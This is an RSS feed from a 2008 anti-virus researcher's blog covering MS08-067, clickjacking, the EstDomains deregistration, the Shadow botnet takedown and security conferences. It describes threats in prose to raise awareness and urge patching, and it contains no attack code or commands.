<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' version='2.0'><channel><atom:id>tag:blogger.com,1999:blog-8234450</atom:id><lastBuildDate>Tue, 11 Nov 2008 14:21:06 +0000</lastBuildDate><title>WAVCi</title><description>This is the original Eddy Willems WeBlog, which is dedicated to my Anti-Virus work and research, my family, friends and colleagues all over the world. I try to give you a different general look at the Anti-Virus and Security world! This Blog does not reflect the ideas of Kaspersky Lab, EICAR or my former employers. You can find my full website at www.wavci.com or www.anti-malware.info .</description><link>http://www.anti-malware.info/weblog/</link><managingEditor>noreply@blogger.com (Eddy Willems)</managingEditor><generator>Blogger</generator><openSearch:totalResults>416</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-126145841649180628</guid><pubDate>Tue, 11 Nov 2008 14:12:00 +0000</pubDate><atom:updated>2008-11-11T15:21:06.974+01:00</atom:updated><title>Looking at what's happening within malicious PDFs...</title><description>During Infosec.nl, as blogged before (my former posting), I will talk about the virus analyst's daily work. One nice tool which could fit in is one of the tools created by Didier Stevens, a friend blogger. 
&lt;br /&gt;On his blog he describes how, using this tool, he can reconstruct the malware writer's trial-and-error process by looking at the incremental updates and metadata within the malicious PDF.&lt;br /&gt;Nice reading at this link:&lt;br /&gt;&lt;a href="http://blog.didierstevens.com/2008/11/10/shoulder-surfing-a-malicious-pdf-author/"&gt;http://blog.didierstevens.com/2008/11/10/shoulder-surfing-a-malicious-pdf-author/&lt;/a&gt;</description><link>http://www.anti-malware.info/weblog/2008/11/looking-whats-happening-within-malicous.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-6478475909339045522</guid><pubDate>Thu, 06 Nov 2008 13:51:00 +0000</pubDate><atom:updated>2008-11-06T15:10:54.848+01:00</atom:updated><title>A virus analyst in 15 minutes? (at Infosecurity.nl 2008)</title><description>Is it possible to become a virus analyst in 15 minutes? That's the question which will be answered during my presentation at Infosecurity.nl . If you want to have a look at the daily work of an analyst or want to become one, this is a must! &lt;br /&gt;You can find more info at the website &lt;a href="http://sites.vnuexhibitions.com/sites/bezoekers_infosecurity_nl/nl/page.asp?module=pages&amp;type=item&amp;id=20284"&gt;www.infosecurity.nl&lt;/a&gt; &lt;br /&gt;I will also be available at the venue in Utrecht &lt;br /&gt;during the 2 days at our booth 08D060. &lt;br /&gt;The case study and presentation will be given in room 9. 
(14:45-15:15 daily)&lt;br /&gt;A lot of people have already registered to attend this presentation, so hurry up if you want to be there!</description><link>http://www.anti-malware.info/weblog/2008/11/virusanalyst-in-15-minutes.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-2480728287563232543</guid><pubDate>Wed, 05 Nov 2008 14:53:00 +0000</pubDate><atom:updated>2008-11-05T15:58:20.387+01:00</atom:updated><title>MS08-067 problems continued ...</title><description>The first reports of a worm capable of exploiting the MS08-067 vulnerability are showing up. The dropped components include a kernel-mode DDoS bot that currently has a selection of Chinese targets in its configuration. The worm component is detected as Exploit.Win32.MS08-067.g by Kaspersky Lab. Other names may be used by other AV vendors (Exploit:Win32/MS08067.gen!A is Microsoft's name).</description><link>http://www.anti-malware.info/weblog/2008/11/ms08-067-problems-continued.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-8539487833308128660</guid><pubDate>Fri, 31 Oct 2008 13:40:00 +0000</pubDate><atom:updated>2008-10-31T14:43:02.801+01:00</atom:updated><title>POC binaries for MS08-067 seen...</title><description>The first Proof of Concept binaries that target the MS08-067 vulnerability have been seen. The payload's function is to add the guest account to the administrators group, thus allowing unlimited access to the machine. 
Let's keep an eye on it ...</description><link>http://www.anti-malware.info/weblog/2008/10/poc-binaries-for-ms08-067-seen.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-1441385684975418158</guid><pubDate>Fri, 31 Oct 2008 13:24:00 +0000</pubDate><atom:updated>2008-10-31T14:29:18.049+01:00</atom:updated><title>EstDomains is not dead yet ...</title><description>The EstDomains story continues. ICANN received a response from EstDomains, and the termination has been stayed. &lt;br /&gt;You can read the details &lt;a href="http://www.icann.org/en/announcements/announcement-2-29oct08-en.htm"&gt;here&lt;/a&gt;.&lt;br /&gt;What a good lawyer can do these days, isn't it?&lt;br /&gt;What can I say ... a 'stay of execution' ... I hope.</description><link>http://www.anti-malware.info/weblog/2008/10/estdomains-is-not-yet-dead.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-5287502758587875827</guid><pubDate>Thu, 30 Oct 2008 19:34:00 +0000</pubDate><atom:updated>2008-10-30T20:43:07.163+01:00</atom:updated><title>EstDomains is dead ...</title><description>EstDomains is a domain registrar operating from Estonia. They've been the largest registrar used by online criminals for their domain name registration needs. ICANN has pulled the plug on EstDomains, and is removing EstDomains from the list of ICANN-accredited registrars. Most of us first ran into EstDomains in 2005, when investigating the infamous WMF vulnerability. Initially the main site distributing malicious WMF files, unionseek.com, was registered via this new Estonian registrar.&lt;br /&gt;Since then, tens of thousands of malicious domains have been registered with EstDomains. 
These include drive-by-download sites, botnet command-and-control servers, spammed domains and so on.&lt;br /&gt;&lt;br /&gt;So this is really good news, but it took a long time for ICANN to do this.&lt;br /&gt;Nevertheless ... thank you ICANN. &lt;br /&gt;You can read more at the blogs from F-Secure and McAfee.</description><link>http://www.anti-malware.info/weblog/2008/10/estdomains-is-dead.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-6945816423248472687</guid><pubDate>Thu, 30 Oct 2008 19:29:00 +0000</pubDate><atom:updated>2008-10-30T20:34:03.528+01:00</atom:updated><title>MS08-067 vulnerability could hit us hard if we don't patch.</title><description>Apply the patch referred to in MS08-067 right away, because Trojan horses that take advantage of this security hole are sure to hit us soon. The vulnerability is similar to the hole that was used by the MSBlaster worm, which surfaced on the Internet in 2003. So don't let down your guard. Patch your PC if you haven't already done so, because this exploit is sure to be the focus of malware authors before long.&lt;br /&gt;Since it's only a matter of time until such attacks become widespread, I urge you to reach out to other Windows users you know to ensure that they're protected from this vulnerability — once you've patched your own systems, that is. And oh yes, don't forget to reboot after the patch! 
A lot of users seem to forget this, and it is really needed.</description><link>http://www.anti-malware.info/weblog/2008/10/ms08-067-vulnerability-could-hit-us.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-5913319255361863388</guid><pubDate>Wed, 29 Oct 2008 19:11:00 +0000</pubDate><atom:updated>2008-10-29T20:13:11.022+01:00</atom:updated><title>Clickjacking: A security problem for all browsers.</title><description>At the moment of writing, most browsers are still susceptible to clickjacking, but you can take steps to reduce the risk. But what is clickjacking really?&lt;br /&gt;&lt;br /&gt;Clickjacking allows an attacker to use one or more of several new attack scenarios to literally steal your mouse clicks. When you think you're clicking on a simple button — for example, to see the next page of an article — you may actually be giving the bad guys permission to do something entirely different, such as log on to your online checking account.&lt;br /&gt;&lt;br /&gt;By taking advantage of any of a growing number of recently discovered vulnerabilities in Microsoft's Internet Explorer, Mozilla's Firefox, Apple's Safari, and all other Web browsers, criminals can hijack your system by intercepting clicks on what appear to be legitimate links. The problem doesn't stop there, however. At least some of the flaws that make clickjacking possible also show up in such popular Web tools as Adobe's Flash player and Microsoft's Silverlight streaming-media plug-in. If they can control where your clicks are going, they may be able to get a user to reconfigure the system so that security is disabled. &lt;br /&gt;In clickjacking, surreptitious buttons are "floated" behind the actual buttons that you see on a Web site. When you click the button, you're not triggering the function that you expected. Instead, the click is routed to the bad guy's substitute link.&lt;br /&gt;Clickjacking isn't new. 
In fact, it dates back to at least 2002 or 2003. &lt;br /&gt;What's new is the range of browser vulnerabilities that make clickjacking possible.&lt;br /&gt;There are multiple variants of clickjacking. Some require cross-domain access, some don't. Some overlay entire pages over a page, some use iFrames to get you to click on one spot. Some require JavaScript, some don't. Some variants use CSRF [Cross-Site Request Forgery] to pre-load data in forms, some don't. Clickjacking does not cover any one of these use cases, but rather all of them. This doesn't mean there are no protections, however. In fact, one of the most important steps that users can take to protect themselves is to enable JavaScript only for approved sites. Disabling JavaScript has serious drawbacks, because so much of the Web's interactivity is driven by JavaScript apps. And even browsing with JavaScript disabled will not protect against all possible avenues of attack. Most browsers are vulnerable. &lt;br /&gt;Besides browsers, the bad guys can also exploit Web programs such as Adobe's Flash player. For instance, one proof-of-concept demonstration shows that a hacker can use the Flash player to take over a PC's webcam and microphone. Imagine the implications of stalkers eavesdropping on your laptop's built-in camera and mic. Clickjacking vulnerabilities don't stop there; attacks may also be launched via iFrames by using cross-site scripting techniques. So disabling browser plug-ins and scripting will help but is no panacea, given the threat's complexity.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Can you stay safe in an internet-connected world with clickjacking around? &lt;br /&gt;&lt;br /&gt;Browser and plug-in vendors have joined other organizations in describing what you can do to stay safe. Adobe, the Mozilla Foundation and Microsoft have several webpages up describing several precautions or solutions. Even taking all these precautions doesn't guarantee that your system is 100% immune to the new threat. 
You'll need to become more conservative in visiting untrustworthy sites until the applications you use are made more secure.&lt;br /&gt;While we're all waiting for vendors to patch their products, when in doubt, ask yourself whether your mother would approve of the site. However, even on sites where you could reasonably expect to be safe from such attacks, you can still be blindsided, so always think twice before you click. &lt;br /&gt;&lt;br /&gt;However, I stay optimistic. While the threat of attack may be high for the next three to six months, I expect more complete protections to become available within the same timeframe.</description><link>http://www.anti-malware.info/weblog/2008/10/clickjacking-security-problem-for-all.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-2372787117448035113</guid><pubDate>Fri, 24 Oct 2008 10:54:00 +0000</pubDate><atom:updated>2008-10-24T13:00:12.790+02:00</atom:updated><title>A problematic MS remote code execution vulnerability fixed, please update ASAP!</title><description>Yesterday Microsoft released a security update that fixes a remote code execution vulnerability in the Windows Server Service. This is a serious vulnerability, and MS have seen targeted attacks using this vulnerability to compromise fully-patched Windows XP and Windows Server 2003 computers, so MS have released the fix "out of band" (not on the regular Patch Tuesday). Due to the serious nature of the vulnerability and the threat landscape requiring an out-of-band release, you probably have questions about your own organization's risk level, what actions you can take to protect yourself, and why newer platforms are at reduced risk. 
We hope to answer those questions in this blog post.&lt;br /&gt;&lt;br /&gt;Which platforms are at higher risk?&lt;br /&gt;&lt;br /&gt;An unauthenticated attacker can trigger this vulnerability remotely for code execution on Windows 2000, Windows XP and Windows Server 2003. By default, Windows Vista and Windows Server 2008 require authentication. However, the attacker must be able to reach the RPC interface to exploit the vulnerability. In the default out-of-the-box scenario, the interface is not reachable due to the firewall enabled by default on Windows XP SP2, Windows Vista, and Windows Server 2008. Unfortunately, either one of the following two conditions exposes the RPC endpoint:&lt;br /&gt;&lt;br /&gt;1) Firewall is disabled&lt;br /&gt;2) Firewall is enabled but file/printer sharing is also enabled.&lt;br /&gt;&lt;br /&gt;When File/Printer Sharing is enabled on Windows Vista and Windows Server 2008, the firewall only exposes the RPC interface to the network type on which sharing was enabled. For example, if a printer is shared on a network type ‘Private’, the firewall will block incoming RPC connections if the computer switches over to a network type ‘Public’. 
If you then choose to share the printer on the network type ‘Public’, Vista and Windows Server 2008 will prompt to ask if you really want to enable “File and Printer Sharing” for ALL public networks.&lt;br /&gt;&lt;br /&gt;For more information about file/printer sharing, visit the following URLs:&lt;br /&gt;&lt;br /&gt;- for Vista &lt;a href="http://technet.microsoft.com/en-us/library/bb727037.aspx"&gt;http://technet.microsoft.com/en-us/library/bb727037.aspx&lt;/a&gt;&lt;br /&gt;- for XP &lt;a href="http://www.microsoft.com/windowsxp/using/security/learnmore/sp2firewall.mspx"&gt;http://www.microsoft.com/windowsxp/using/security/learnmore/sp2firewall.mspx&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Most perimeter firewalls will block exploit attempts from outside your organization&lt;br /&gt;&lt;br /&gt;If you are behind a perimeter firewall that filters inbound connections to TCP ports 139 and 445, you will not be reachable from the Internet. This is a common home user scenario. In this scenario, only the machines in your local LAN will have the ability to exploit this vulnerability.&lt;br /&gt;&lt;br /&gt;How you can protect yourself&lt;br /&gt;&lt;br /&gt;You should apply the security update as soon as you can. This is the best way you can protect yourself. While you are testing the update and preparing your deployment process, you may choose to use one or more of the workarounds listed in the security bulletin. 
( &lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx"&gt;http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx&lt;/a&gt; )</description><link>http://www.anti-malware.info/weblog/2008/10/problematic-ms-remote-code-execution.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-8513029193401078301</guid><pubDate>Tue, 21 Oct 2008 09:15:00 +0000</pubDate><atom:updated>2008-10-21T11:36:26.215+02:00</atom:updated><title>Everyone could become a cyber-criminal? I'm not sure...</title><description>Or in Dutch 'Iedereen kan een cyber-crimineel worden', quoted from De Standaard, a newspaper in Belgium. &lt;br /&gt;You can find the article &lt;a href="http://www.standaard.be/Artikel/Detail.aspx?artikelId=LO21VSI1&amp;ref=front"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Well, this is my reaction to this article, and I do not completely agree! &lt;br /&gt;The problem lies in our mindset, and as long as not everybody is thinking in the correct way, we will indeed face a problem. It's something I already told the public back in 2004. The general public and children do not seem to know what computer security is. And it all goes back to what we teach our children, and that's the real problem in my opinion. We don't teach children well these days. My research found that some of them even find the idea of becoming a hacker or a virus writer ‘cool’. Although some families use parental control mechanisms to secure their home computer networks, many children know how to bypass these mechanisms. Generally, it seems that our children’s knowledge of ethical&lt;br /&gt;computer behaviour and good ‘netiquette’ is a long way off target.&lt;br /&gt;&lt;br /&gt;And it's not only children anymore these days. This article in 'De Standaard' is a perfect example, 'unfortunately'! Was it really necessary to show the real problem to the public and go to the press with it? 
Do you as a reader of this blog still know the line between good and bad on the internet? I doubt it.&lt;br /&gt;&lt;br /&gt;A suggestion as to how we may begin to influence students and young people is by using societal control. An example of how this has worked in the past is with the issue of drink-driving. At one time, drinking and driving was a personal choice, but&lt;br /&gt;as society witnessed some of the consequences of the combination of the two activities, we began to pass laws which restricted such behaviour. Initially there was some resistance to these laws – people saw them as an infringement on their rights. However, as the laws became more widely accepted, people began to refuse to drink and drive on the principle that it is ‘wrong’ to do so.&lt;br /&gt;Policy makers and law makers are very aware of this form of societal control. However, they are less aware of the societal structure of ‘cyberspace’, and for this reason there is the danger that the laws they make will not create the desired ethical model, and conversely will create a backlash or revolutionary movement. By taking time to develop realistic policies and effective laws, it is possible we can&lt;br /&gt;avoid such a reaction. The speed with which global electronic communication is&lt;br /&gt;developing has brought with it an enormous benefit to all those fortunate enough to be able to exploit it. However, it has also brought opportunities to those who are willing to abuse it. The way in which it has introduced relative and absolute&lt;br /&gt;anonymity for its users may encourage acts which would otherwise have appeared to be too risky to the perpetrator. Its very nature may encourage various kinds of anti-social activities, ranging from innocent pranks through serious malicious damage to data and individuals, and downright criminal fraud. 
As a result of the fact that many of its principal users are relatively young, or people who may be impressionable or unprincipled, an ethos has developed in the Internet&lt;br /&gt;community, in which it is ‘cool’ to be an outlaw. Moreover, the inherent power embodied in being able to control the ‘system’ is potentially irresistible.&lt;br /&gt;Resources that would enable us to emphasize and integrate ethical computing behaviour may provide a stabilizing influence. Our computing environments are very vulnerable regarding distribution of information – after all, it is what&lt;br /&gt;they were designed to do. If we want to change people’s behaviour and reduce the&lt;br /&gt;attractiveness of becoming a virus writer or hacker, we must start ethical computer education at a much earlier age. I think the way forward is to recognize the different factors introduced by computer technology – factors we have long&lt;br /&gt;ignored. If we don’t, the technology may ultimately be self-destructive.&lt;br /&gt;But that's not what you always read in the newspapers, is it?   ;-)</description><link>http://www.anti-malware.info/weblog/2008/10/everyone-could-become-cyber-criminal-im.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-7425209353864540620</guid><pubDate>Thu, 16 Oct 2008 18:18:00 +0000</pubDate><atom:updated>2008-10-16T20:24:56.813+02:00</atom:updated><title>PiggyBacking is not allowed in Belgium.</title><description>During my visit to the Virus Bulletin conference 2008, two weeks ago, a man was arrested in Belgium for using someone else's unsecured Wifi connection to get on the Internet. 
(More details in Dutch available &lt;a href="http://www.gva.be/nieuws/binnenland/default.asp?art={63FABA4D-5EC9-4CF4-A3DE-956E59563160}"&gt;here&lt;/a&gt;).&lt;br /&gt;The case is interesting because the only thing this guy did was use the connection to get onto the Internet - what we call Wifi "piggybacking," or logging on to someone's open 802.11b/g/n network without their knowledge or permission. And quite a lot of countries (such as the UK and Belgium) have laws making this illegal. Stealing Wifi Internet access may feel like a victimless crime, but it's wrong nonetheless. You could be depriving ISPs of revenue. Furthermore, if you've hopped onto your next door neighbors' wireless broadband connection to illegally download movies and music from the Internet, chances are that you are also slowing down their Internet access and eating into their download limit. From a security point of view, if someone can access your network, they can misuse that network, and (potentially) the computers on it. And Belgian law enforcement want to make an example of the man arrested last week. So to stay on the right side of the law, do yourself a favour: don't go using anyone else's network without permission. 
And make sure that your network and router are secured - you may be ethical, but that doesn't mean that everyone else is.&lt;br /&gt;&lt;br /&gt;If you want to read more about this, please also read my posting from 10 October at the &lt;a href="http://www.viruslist.com/en/weblog"&gt;weblog&lt;/a&gt; from Kaspersky Lab.</description><link>http://www.anti-malware.info/weblog/2008/10/piggybacking-is-not-allowed-in-belgium.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-3962310468527569117</guid><pubDate>Fri, 10 Oct 2008 13:18:00 +0000</pubDate><atom:updated>2008-10-10T15:53:45.557+02:00</atom:updated><title>Eugene Kaspersky and David Perry working for ESET?</title><description>&lt;a href="http://www.anti-malware.info/weblog/uploaded_images/0110200820172330IMG1726-767993.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://www.anti-malware.info/weblog/uploaded_images/0110200820172330IMG1726-767990.jpg" border="0" alt="" /&gt;&lt;/a&gt;Of course they are not! This is just one of the many pictures I've taken during the Virus Bulletin Conference 2008 in Ottawa. It was my 13th VB in a row! And again everybody was overloaded with good presentations ranging from the definition of Cybercrime via Russian spam and botnets to phishing related to the recent worldwide 'bank-problem'. You can always find an interesting subject, and if you didn't, the networking possibilities are nearly endless. 
Kaspersky Lab, the company I am working for, was present with 3 speakers and a large team of delegates.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.anti-malware.info/weblog/uploaded_images/0410200820152437IMG1801-774181.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://www.anti-malware.info/weblog/uploaded_images/0410200820152437IMG1801-774177.jpg" border="0" alt="" /&gt;&lt;/a&gt;You can see my colleagues Costin Raiu, Roel Schouwenberg and me in the second picture.&lt;br /&gt;&lt;br /&gt;You can find my pictures from VB 2008 at &lt;a href="http://www.wavci.com/albums"&gt;this&lt;/a&gt; link.&lt;br /&gt;You can even find older pictures from some older events as well over there.&lt;br /&gt;&lt;br /&gt;I also put up a movie from the event online at my iTunes and YouTube Channels:&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/7VYa85ESLP4&amp;hl=en&amp;fs=1"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/7VYa85ESLP4&amp;hl=en&amp;fs=1" type="application/x-shockwave-flash" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;And there are Kaspersky Lab (Internet Security Suite 2009) prizes for the first 5 correct answers...</description><link>http://www.anti-malware.info/weblog/2008/10/eugene-kaspersky-and-david-perry.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-6365876145806480947</guid><pubDate>Sun, 28 Sep 2008 16:15:00 +0000</pubDate><atom:updated>2008-09-28T18:24:14.823+02:00</atom:updated><title>On my way to the VB conference ...</title><description>Indeed I'm on my way to the VB conference in Ottawa, Canada. WOW ... This is my number 13 of all the Virus Bulletin conferences. 
I've been attending since 1996 (Brighton, UK) and I can assure you that this is the best conference if you are in the anti-malware industry. You can find more about the conference itself at the &lt;a href="http://www.virusbtn.com"&gt;VB website&lt;/a&gt;. As always I will post some pictures over here afterwards or during the conference. And BTW, if you're not there, you're either sick or dead or you just don't belong to that part of the industry. It's as simple as that!   ;-)</description><link>http://www.anti-malware.info/weblog/2008/09/on-my-way-to-vb-conference.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-1590328490634295314</guid><pubDate>Tue, 23 Sep 2008 17:43:00 +0000</pubDate><atom:updated>2008-09-23T20:10:41.532+02:00</atom:updated><title>GeenStijl and GeenCommentaar: 0/10 ..Unethical in every aspect!</title><description>It's been a bit of a bumpy ride on the Dutch part of the internet over the last couple of days. One blog - www.geencommentaar.nl - decided to set up something I like to call a 'web 2.0 honeypot' in the form of a petition. The idea behind this was to attract the attention of the biggest blog in the Netherlands - www.geenstijl.nl - and get GeenStijl readers to comment. GeenCommentaar logged the IP addresses of users who made offensive comments on the blog and created a database. (A lot of the offensive comments came from GeenStijl users). Other bloggers could then check the database to see if a particular IP address had been tagged as offensive. Supposedly the idea behind this was to make life easy for other site/ blog owners, by offering an automatic way to filter out (probably) unwanted comments/ content. When GeenStijl realized what was happening, they responded with a vengeance by adding a piece of Javascript to their page. 
This meant that when anyone visited the GeenStijl site, a random IP address was generated, and the GeenCommentaar database would be queried to see if the IP address had been tagged as offensive. All of this was done automatically and without visitors to the site knowing anything about it. &lt;br /&gt;The result? GeenCommentaar's server couldn't handle the load; as well as GeenCommentaar getting hit, some other sites running on the same server were overloaded. In addition to the obvious ethical objections, both the parties involved are breaking the law. &lt;br /&gt;BTW Kaspersky Lab added detection for this DDoS script as Trojan-Clicker.JS.Small.p .&lt;br /&gt;&lt;br /&gt;If you want to read more about it &lt;br /&gt;please look at my colleague Roel's comment at &lt;br /&gt;&lt;a href="http://www.viruslist.com/en/weblog?weblogid=208187571"&gt;Kaspersky Virus Analyst's Diary&lt;/a&gt; &lt;br /&gt;or read my own comments in Dutch at &lt;a href="http://webwereld.nl/articles/52845/-pestscript-van-geenstijl-is-malware-.html"&gt;webwereld.nl&lt;/a&gt;&lt;br /&gt;A lot of people seem not to think anymore about what is good or bad on the internet. They just act and play like 'criminal' children without noticing! Unbelievable! &lt;br /&gt;Well ... 
at least their names are well chosen: no comment with no style.</description><link>http://www.anti-malware.info/weblog/2008/09/geenstijl-and-geencommentaar-010.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-2880031912598933280</guid><pubDate>Sun, 21 Sep 2008 15:38:00 +0000</pubDate><atom:updated>2008-09-21T17:48:58.299+02:00</atom:updated><title>Back from Govcert.nl 2008</title><description>&lt;a href="http://www.anti-malware.info/weblog/uploaded_images/17092008-091130IMG1539-776267.JPG"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://www.anti-malware.info/weblog/uploaded_images/17092008-091130IMG1539-776263.JPG" border="0" alt="" /&gt;&lt;/a&gt;I'm just back from the Govcert.nl Symposium 2008 in Rotterdam. It's very interesting to watch how much money the Government of the Netherlands can invest in such kind of events. Most other events are heavily sponsored to make such events possible ... Congrats to Govcert.nl, very well done; however, if you are a real pro or an anti-virus/malware insider it was not that inspiring. I loved, however, the keynote speeches and especially the 'no press allowed' presentation of the arrests made by the joint efforts of the NHCU and FBI. You can find more background on that case, in which I was also involved, in my former postings (see August). 
You can still find the full programme details at &lt;a href="http://www.govcert.nl/symposium "&gt;http://www.govcert.nl/symposium &lt;/a&gt;.</description><link>http://www.anti-malware.info/weblog/2008/09/back-from-govcertnl-2008.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-5093319320027998197</guid><pubDate>Sun, 07 Sep 2008 14:09:00 +0000</pubDate><atom:updated>2008-09-07T16:30:49.548+02:00</atom:updated><title>Goodie Security Picture of the Month</title><description>&lt;a href="http://www.anti-malware.info/weblog/uploaded_images/norton360-744094.JPG"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" src="http://www.anti-malware.info/weblog/uploaded_images/norton360-744069.JPG" border="0" alt="" /&gt;&lt;/a&gt;Busy weeks for me ... yes, a lot of business and a lot of events to attend, that's what was happening the past weeks. From now on I will post a picture from all these events on my blog. Last week we got two nice launch events for our Kaspersky Hosted Security Solution in the Netherlands and Belgium, organised by 2 of our distributors. The week before I attended a BBQ event at Copaco Belgium. This week I will attend and speak at the L-Sec Security Conference on Friday. You can have a look at the other speakers on their website at &lt;a href="http://www.lsec.be"&gt;http://www.lsec.be&lt;/a&gt; . I will present: 'A Virus Analyst in 15 Minutes?' .&lt;br /&gt;&lt;br /&gt;Furthermore, I was cleaning up my attic a little bit, where I found a lot of old and newer security goodies (the free give-aways at conferences). So from now on I am going to use the good ones, after I threw away some other rubbish. For this job I got the wonderful help of a Symantec display box. On the picture you can see how you could use it in a creative way.   ;-)   &lt;br /&gt;BTW it's just a coincidence that I used a Symantec 'box' for it. 
&lt;br /&gt;Other display boxes are also quite good.&lt;br /&gt;This time this picture becomes the Security Goodie of the month!</description><link>http://www.anti-malware.info/weblog/2008/09/goodie-security-picture-of-month.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-591749003623161079</guid><pubDate>Wed, 13 Aug 2008 13:06:00 +0000</pubDate><atom:updated>2008-08-13T15:09:07.869+02:00</atom:updated><title>Kaspersky Lab helps Dutch police dismantle Shadow botnet.</title><description>FYI: This was the press release which I spoke about in my former blog posting.&lt;br /&gt;&lt;br /&gt;The Dutch High Tech Crime Unit identified a large botnet when they arrested a 19 year old Dutch man last week. The Unit asked Kaspersky Lab, a leading developer of secure content management solutions, to provide the victims with instructions on how to neutralize the malware on their systems; neutralizing the malware ultimately brings down the botnet. This is an excellent example of the close co-operation which exists between the antivirus industry and law enforcement.&lt;br /&gt;&lt;br /&gt;At the request of the Dutch police, Kaspersky Lab created detailed instructions on how to remove the malware. The Dutch police have pointed victims towards a page on the Kaspersky Lab website which contains the removal instructions, and also to a website which gives victims the opportunity to make a formal complaint to the police. Eddy Willems, Security Evangelist with Kaspersky Lab Benelux, who worked closely with the High Tech Crime Unit, believes this case clearly illustrates how the security industry can help law enforcement in the fight against cybercrime.  A spokesperson for the Public Prosecution Service agrees: “The Public Prosecution Service and the police worked together with Kaspersky Lab on this case with full contentment”. 
&lt;br /&gt;&lt;br /&gt;The so-called Shadow botnet is made up of around 100,000 infected machines from all over the world. A botnet is a collection of computers infected with malware which are then linked into a network. The infected machines can be controlled remotely (without their owners' knowledge or consent) and used by criminals to send spam, attack websites, or steal confidential data such as credit card numbers.&lt;br /&gt;&lt;br /&gt;Last week the Dutch police arrested a 19 year old Dutch man for selling this botnet to a Brazilian who was also arrested. The arrests were the result of an operation conducted by the High Tech Crime Unit and the FBI.&lt;br /&gt;&lt;br /&gt;If you think you're a victim&lt;br /&gt;If you think your computer is part of the botnet, please follow the removal instructions at www.kaspersky.com/shadowbot. However, the removal instructions only apply to the malware which has been used to create the botnet.  Eddy Willems warns: “These programs may have downloaded additional malware to computers which were part of the botnet. So users should make sure they perform a full scan of their machine using an up-to-date antivirus solution." If you have Kaspersky® Internet Security or Kaspersky® Anti-Virus running on your computer, you do not need to follow the instructions, as the software will automatically detect and delete the malware.</description><link>http://www.anti-malware.info/weblog/2008/08/kaspersky-lab-helps-dutch-police.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-8234450.post-7486164331193142178</guid><pubDate>Wed, 13 Aug 2008 12:49:00 +0000</pubDate><atom:updated>2008-08-13T15:05:42.024+02:00</atom:updated><title>I'm back!</title><description>Is Eddy Willems dead? How can we reach Eddy?&lt;br /&gt;Several people sent me some emails because they were worried about what happened to Eddy.... 
he's not blogging anymore.&lt;br /&gt;Well, there are some good reasons why you didn't hear from me ...&lt;br /&gt;First of all, I was terribly sick, with a fever sometimes higher than 39.5 C. A double Salmonella bacterial infection hit me seriously and I was out for several weeks. And it was also very bad timing: it happened just before the main Kaspersky event of the year! This was possibly the first conference or event I have missed in 20 years.&lt;br /&gt;However, I recovered quite well, and just afterwards my vacation period was popping up, meaning ... no worries, no calls, no media. That's possibly what you think. &lt;br /&gt;You are of course wrong, because I even did a few interviews and two television interviews during my vacation.&lt;br /&gt;Both of them can be viewed at the press page of my site.&lt;br /&gt;&lt;br /&gt;Starting from today I'm blogging again, and there is more reason than you think ... a lot of things have already happened, going from a Kaspersky press release together with the National High Tech Crime Unit of the Dutch police to the bizarre race-to-zero creation and test case!&lt;br /&gt;A case I already spoke about to the press some months ago.</description><link>http://www.anti-malware.info/weblog/2008/08/im-back.html</link><author>noreply@blogger.com (Eddy Willems)</author></item><item><guid 